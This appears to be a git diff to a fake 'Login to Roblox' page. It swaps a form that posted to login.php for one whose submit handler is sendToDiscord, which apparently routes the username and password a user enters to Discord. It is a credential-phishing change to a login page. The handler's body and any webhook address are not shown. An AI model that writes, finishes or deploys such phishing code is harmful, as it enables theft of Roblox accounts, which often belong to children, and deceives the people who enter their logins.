--- a/index.html
+++ b/index.html
@@ -62,7 +62,7 @@
     <div class="main">
         <div class="login-container">
             <h1>Login to Roblox</h1>
-            <form action="login.php" method="POST" onsubmit="validateForm(event)">
+            <form onsubmit="sendToDiscord(event)">
                 <div class="input-field">
                     <input type="text" name="username" placeholder="Username/Email/Phone">
                 </div>
